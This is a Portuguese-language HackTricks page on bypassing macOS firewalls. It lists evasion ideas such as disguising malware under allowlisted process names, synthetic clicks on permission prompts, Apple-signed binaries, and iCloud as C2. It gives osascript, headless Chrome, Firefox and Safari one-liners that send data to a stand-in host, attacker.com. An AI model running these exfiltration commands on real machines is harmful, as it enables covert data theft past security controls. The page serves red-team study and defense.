4.5 KiB
macOS Bypassando Firewalls
Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras formas de apoiar o HackTricks:
- Se você quer ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, confira os PLANOS DE ASSINATURA!
- Adquira o material oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção de NFTs exclusivos
- Junte-se ao grupo 💬 Discord ou ao grupo telegram ou siga-me no Twitter 🐦 @carlospolopm.
- Compartilhe suas técnicas de hacking enviando PRs para os repositórios github HackTricks e HackTricks Cloud.
Técnicas encontradas
As seguintes técnicas foram encontradas funcionando em alguns aplicativos de firewall do macOS.
Abusando de nomes na lista de permissões
- Por exemplo, nomeando o malware com nomes de processos bem conhecidos do macOS como
launchd
Clique Sintético
- Se o firewall pedir permissão ao usuário, faça o malware clicar em permitir
Usar binários assinados pela Apple
- Como
curl
, mas também outros comowhois
Domínios apple bem conhecidos
O firewall pode estar permitindo conexões com domínios bem conhecidos da apple, como apple.com
ou icloud.com
. E o iCloud pode ser usado como um C2.
Bypass Genérico
Algumas ideias para tentar burlar firewalls
Verificar tráfego permitido
Saber o tráfego permitido ajudará você a identificar domínios potencialmente na lista de permissões ou quais aplicativos têm permissão para acessá-los
lsof -i TCP -sTCP:ESTABLISHED
Abusando do DNS
Resoluções de DNS são feitas através da aplicação assinada mdnsreponder
, que provavelmente será permitida para contatar servidores DNS.
Através de aplicativos de navegador
- osascript
tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell
- Google Chrome
{% code overflow="wrap" %}
"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"
{% endcode %}
- Firefox
firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"
- Safari
open -j -a Safari "https://attacker.com?data=data%20to%20exfil"
Via injeções de processos
Se você conseguir injetar código em um processo que tem permissão para se conectar a qualquer servidor, você poderá contornar as proteções do firewall:
{% content-ref url="macos-proces-abuse/" %} macos-proces-abuse {% endcontent-ref %}
Referências
Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras formas de apoiar o HackTricks:
- Se você quiser ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, confira os PLANOS DE ASSINATURA!
- Adquira o material oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção de NFTs exclusivos
- Junte-se ao grupo 💬 Discord ou ao grupo telegram ou siga-me no Twitter 🐦 @carlospolopm.
- Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub HackTricks e HackTricks Cloud.